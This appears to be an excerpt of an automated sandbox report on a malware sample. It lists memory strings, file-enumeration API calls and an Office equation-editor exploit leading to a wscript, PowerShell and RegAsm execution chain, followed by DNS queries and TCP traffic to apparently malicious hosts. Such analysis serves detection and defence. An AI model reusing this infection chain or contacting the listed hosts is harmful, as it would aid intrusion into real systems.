                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407877 FindFirstFileW,FindNextFileW,13_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044E8F9 FindFirstFileExA,13_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10006580 FindFirstFileExA,13_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Suspicious execution chain found
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global trafficDNS query: name: og1.in
                Source: global trafficDNS query: name: og1.in
                Source: global trafficDNS query: name: og1.in
                Source: global trafficDNS query: name: og1.in
                Source: global trafficDNS query: name: og1.in
                Source: global trafficDNS query: name: og1.in
                Source: global trafficDNS query: name: og1.in
                Source: global trafficDNS query: name: raw.githubusercontent.com
                Source: global trafficDNS query: name: geoplugin.net
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 178.237.33.50:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
